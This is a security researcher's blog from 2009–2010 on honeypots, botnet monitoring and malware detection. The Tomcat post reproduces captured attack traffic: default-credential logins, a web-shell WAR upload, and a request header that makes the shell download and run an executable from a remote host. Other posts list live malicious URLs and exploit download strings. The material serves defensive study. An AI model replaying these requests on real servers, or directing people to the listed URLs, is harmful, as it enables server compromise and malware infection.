Virus Blog

Amun - Technical Report

— Posted by zeroq @ 19:41 - 14 Jan, 2010

I finally managed to finish my technical report on the Amun honeypot. I have tried to document all aspects of the software, so others can understand it. Maybe now it is more easy for others to contribute new modules. The PDF document is available here.

 

Abstract:
In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local harddisc, for further analyses. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.



CaptureHPC - detecting malicious websites

— Posted by zeroq @ 23:18 - 10 Dec, 2009
We are currently experimenting with the honeyclient solution CaptureHPC. We have written our own scheduler and client handler in Python and only use the Capture client application to monitor changes on the host. We still have some instability but things are getting better. We hope to release our code soon.
 
Our current setup consist of 3 CaptureHPC clients running in parallel. Our URL database is filled by extracting URLs from the Google search engine after searching for keywords retrieved from Google Trends.
We have detect the following URLs to be malicious during the last days (visit at own risk):
 
www.icelebz.com/ celebs/ gisele_bundchen/ videos/
MD5: f4de2c9f6e6b3ff2e6d2fcd77b9e41ee - Mal/FakeAV-BP
www.experiencefestival.com/ forum/ news-vitamins/ 263373-vitamin-d-benefits-wwlp-22news.html 
MD5: 676399393b565ab1d4808600e337364a - TR/Dropper.Gen
www.gamesurge.com/ strategies/ Gameboy/ Walkthroughs-P/ Pokemon%20Missingno.shtml 
MD5: 0f0d609ddad379a65f7ad08323446ddf - Trojan-Spy.Win32.Zbot.gen
www.submitrightnow.com/ mindy_lawton_tiger_woods 
MD5: ab92cc8f7abeafffc9b588eda2f968cd- Trojan.Win32.Bredolab.Gen.1
izediotia.info/ cgi-bin/ ae 
MD5: 7231cf09b088a8fc4375aed27638f1d9 - Trojan:Win32/Alureon.DA
 
These URLs were all detected within the last four days. The scary thing is the low detection rate of current antivirus software. 


Monitoring the Waledac Botnet

— Posted by zeroq @ 22:53 - 12 Nov, 2009

We have just presented our work about monitoring the Waledac botnet at the European Conference on Computer Network Defense (EC2ND). The main focus of the paper is to get a more insight look at the botnet, that is supposed to be the successor of the Storm Worm botnet. By analyzing the communication infrastructure we managed to construct a fake Waledac instance, called Walowdac, to infiltrate the botnet and collect interesting information. The following image shows the number of bots counted during a single day in august 2009. More information about the approach is presented in the paper.


Abstract:
A botnet is a network of compromised machines under the control of an attacker. Botnets are the driving force behind several misuses on the Internet, for example spam mails or automated identity theft. In this paper, we study the most prevalent peer-to-peer botnet in 2009: Waledac. We present our infiltration of the Waledac botnet, which can be seen as the successor of the Storm Worm botnet. To achieve this we implemented a clone of the Waledac bot named Walowdac. It implements the communication features of Waledac but does not cause any harm, i.e., no spam emails are sent and no other commands are executed. With the help of this tool we observed a minimum daily population of 55,000 Waledac bots and a total of roughly 390,000 infected machines throughout the world. Furthermore, we gathered internal information about the success rates of spam campaigns and newly introduced features like the theft of credentials from victim machines.

This work is a collaboration with Ben Stock, Markus Engelberth, Felix Freiling, and Thorsten Holz.



Network Forensics Puzzle Contest

— Posted by zeroq @ 10:14 - 25 Aug, 2009

I came across a posting on the blog of the Internet Storm Center about a little forensics contest. Although the puzzle is not very hard it is fun to investigate. If you are willing to send in your solution, there is also a prize to win. Winners are to be announced at Sec558 Network Forensics in San Diego, 9/16-9/18.

All you have to do is analyse a pcap file containing valuable information and answer the following questions:

  1. What is the name of Ann's IM buddy?
  2. What was the first comment in the captured IM conversation?
  3. What is the name of the file Ann transferred?
  4. What is the magic number of the file you want to extract (first four bytes)?
  5. What was the MD5sum of the file?
  6. What is the secret recipe?

I won't tell you any solutions here, but i tell you what tools i used to analyse the pcap file. So the number one tool when it comes to pcap is in my opinion still tcpdump. It gives you a quick overview about what happened. Use the appropriate filter options to dump the complete packet content.
This will help you to answer the first few questions. You can also use Wireshark. Another nice tool i came across while investigating the file is tcpxtract. This tool extracts files out of a pcap file. With the help of this tool you are able to extract the file that was transferred, and a bunch of other files =)

To further investigate the instant messenger session i used AimSniff. This tool extracts all kinds of instant messenger information from a given pcap. However, in this case it did not reveal anything that was not already discovered using tcpdump, but it substantiates the earlier foundings.

Another nice tool i used was Chaosreader. This tool generates a nice overview about who is communicating with who and what protocols are used. It extracts sessions and creates some small statistics.

Have fun with the challenge.



Weak Passwords with Tomcat Installations

— Posted by zeroq @ 20:35 - 29 Jul, 2009

We noticed strange HTTP scans in the Amun Honeypot vulnerabilities.log file recently. We run Amun with Webserver emulation in order to catch certain attacks. What we found here are scans for Tomcat installations with a weak password.

The request for Tomcat installations looks like this:

GET /manager/html HTTP/1.1
Referer: http://xxx.xxx.241.29:80/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: xxx.xxx.xxx.29:80
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

The scans look for the manager application of Tomcat with the credentials set to admin:admin. Although Amun is not emulating this application, we could trigger the attack by just replying with 200 OK (standard HTTP). So, the next step in the attack we monitored is a POST request to the upload directory:

POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---------------------------072709230333828
Content-Length: 2495
Host: xxx.xxx.241.29
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://xxx.xxx.241.29:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=

-----------------------------072709230333828
Content-Disposition: form-data; name="deployWar"; filename="C:\\WINDOWS\\system32\\mui\\fexcep\\killfexcepshell.war"
Content-Type: application/x-zip-compressed
PK\x03\x04\x14\x00\x08\x00\x08\x003\x8cq:\x00
[...]

As we can see the attacker tries to upload a file named killfexcepshell.war to our honeypot. Amun does not recognize the attack, but it stores the hexdumps of unknown attack attempts to disk. We were therefore able to reconstruct the zip file from the hexdump. It extracts to the following files (directories):

WEB-INF
ok.jsp
META-INF
index.jsp

Unfortunately no further requests hit our honeypot, so we do not know what would have happened next. Googling for the filename however, revealed a blog entry, that is not reachable anymore. Google Cache is your friend, though.

According to their investigation after uploading the zip file, the attacker initiates a GET request to the following URL:

GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<hidden>.cn/tomcat.exe

The interesting part is the Cache-Vip-Url pointing to some executable file on a chinese webserver. So what does the index.jsp do. It rewrites the tomcat-users.xml file read the following:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1" />
<role rolename="manager"/>
<role rolename="admin"/>
<user username="admin" password="<hidden>" roles="admin,manager"/>
</tomcat-users>

The other operation the index.jsp performs is to look for the above mentioned Cache-Vip-Url HTTP header field and tries to download and execute the file. In case the compromised system is not Windows, the script aborts. Unfortunately we do not have a working URL to download the binary and check what it does. According to the above mentioned blog entry, the malware is called PcClient, some kind of remote administration tool.

The ok.jsp file is just used to display the results of running the index.jsp. The funny thing about the index.jsp is, that it contains a routine to generate a random password to be inserted into the tomcat-users.xml file. However, the randomly generated password is never used, it is just returned to the attacker, but the xml file has a hardcoded password.



Amun v0.1.8

— Posted by zeroq @ 09:12 - 27 Jul, 2009

Although i was not able to finish everything i had planned for the new version, due to lack of time, i decided to release it anyway. So Amun v0.1.8 has a lot of fixes, modifications, and additional stuff. Feedback is always welcome. Documented changes are the following:

 Changes in v0.1.8:
        - added ulm shellcode handler
        - added bergheim shellcode handler
        - added langenfeld connectback2
        - added leimbach encoded tftp command detection
        - added pexalphanumeric b64encoded plain url detection
        - added new amun smb handler
        - fixed netdde vulnerability
        - fixed missing socket import for log-blastomat module
        - fixed reply function to send all bytes
        - fixed amun crash on already used port/address
        - fixed anubis submission module
        - fixed amun ftp NAT download
        - modified ftp_download_core to handle broken pipe on push command
        - modified vuln-http to serve images from folder
        - modified log-surfnet configuration to accept database port
        - modified vuln-arc to no reply
        - modified md5 to hashlib (deprecated warning)
        - modified popen2 to subprocess (deprecated warning)
        - removed conn= parameter prefix for asynchat.async_chat.__init__



Archlinux Atheros WLAN

— Posted by zeroq @ 08:37 - 24 Jul, 2009

For those of you struggling with the Atheros WLAN card and Archlinux distribution, i have a few hints.

The card i use shows up like this:
lspci | grep Atheros
01:0b.0 Network controller: Atheros Communications Inc. AR5008 Wireless Network Adapter (rev 01)

My current kernel version is 2.6.30. The software needed is wpa_supplicant. The most important thing is, make sure the athXk kernel module does not load (X is a number, currently its 9, and was 5 previously). To assure this modify your rc.conf and add MODULES=( ... !ath9k). The only modules that are loaded (lsmod | grep ath) are ath_pci, wlan, ath_rate_sample, and ath_hal. To check your setup use ifconfig -a, you should find a device called ath0. Bring it up using ifconfig ath0 up and do a iwlist ath0 scan to scan for accesspoints nearby. To connect to an accesspoint use iwconfig ath0 essid YourSSID and start your wpa_supplicant by issueing wpa_supplicant -B -iath0 -c/etc/wpa_supplicant.conf. If your accesspoint hands out IPs using dhcp use the command dhcpcd ath0 to get one.

An example of a wpa_supplicant.conf for a WPA secured network looks like follows:

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=wheel
eapol_version=1
ap_scan=1
fast_reauth=1
network={
ssid="YourSSID"
scan_ssid=1
proto=WPA
key_mgmt=WPA-PSK
psk="YourPassphrase(plain ASCII)"
auth_alg=OPEN
}

That is basically all you need to do. To automate the process at boot up, edit your rc.local and add the lines:

ifconfig ath0 up
iwconfig ath0 essid YourSSID
wpa_supplicant -B -iath0 -c/etc/wpa_supplicant.conf
dhcpcd ath0

That´s it.



Visual Analysis of Malware Behavior

— Posted by zeroq @ 17:38 - 26 Jun, 2009

As my colleague philipp already mentioned in his blog, our short paper about the visualization of malware behaviour is accepted at this years VizSec Workshop (11 Oktober, Atlantic City, NJ, USA).

We use transformed sandbox reports as a visualization basis. The recorded malware behaviour is displayed in different ways to aid malware researchers. I will blog more on this topic as soon as the workshop is over. 



Glastopf Webhoneypot Version 0.2.0

— Posted by zeroq @ 14:01 - 14 Jun, 2009

Lukas from Glasblog released a new version of his webhoneypot called Glastopf yesterday. Several new modules have been implemented including a Twitter and an IRC module to log current statistics and attack information. A complete changeset can be found here.

A webhoneypot can be used to detect remote/local file inclusion attacks against current webapplications, such as phpmyadmin or roundcube webmailer. The honeypot simulates several vulnerable webapplications and extracts injected commands from the incoming requests. A request can either try to load another file from a remote server, that is already under the control of the attacker and execute it in the context of the webserver. In some cases these remotely loaded files contain IRC bots, that allow the attacker to take control over the attacked system. Other methods to compromise the system include the gathering of information about the running operating system and then include some local root exploit to take complete control over the server. 



Amun: NetDDE Reloaded

— Posted by zeroq @ 20:54 - 09 Jun, 2009
I am currently working on the CIFS simulation of Amun, so requests to vulnerabilities like NetDDE, LSASS, or MS08067 can be correctly answered. first results are promising, although documentation of the protocol is not the best, i managed to simulated a Windows 2000 for the NetDDE vulnerability (MS04031) good enough to finally trigger current exploits in the wild. I also had to add a new shellcode decoder detection pattern in order to recognize the shellcode used in sample exploits available in the internet.

So far i was able to capture two attacks from different hosts against the NetDDE vulnerability:
exploit 137.118.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@137.118.xxx.xxx:5056/['Cilevb.com'])
exploit  72.253.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@72.253.xxx.xxx:50112/['myreceve.com'])

Unfortunately only one download worked, the second one. The malware has the md5hash 05f9bcf3a7d0ab7b4d4066c095f4c732 and the Anubis Sandbox report can be found here. According to VirusTotal it is an Virut/Rbot variant, which is already well detected by current anti-virus engines.

I have just started to integrate the new CIFS simulation with the MS08067 vulnerability emulation, but i am not yet finished. I will also update the other vulnerability modules that rely on a working simulation rather than random bytes replied with a few bytes set to certain values. There will be a new release of Amun soon, so stay tuned.

Powered by kulando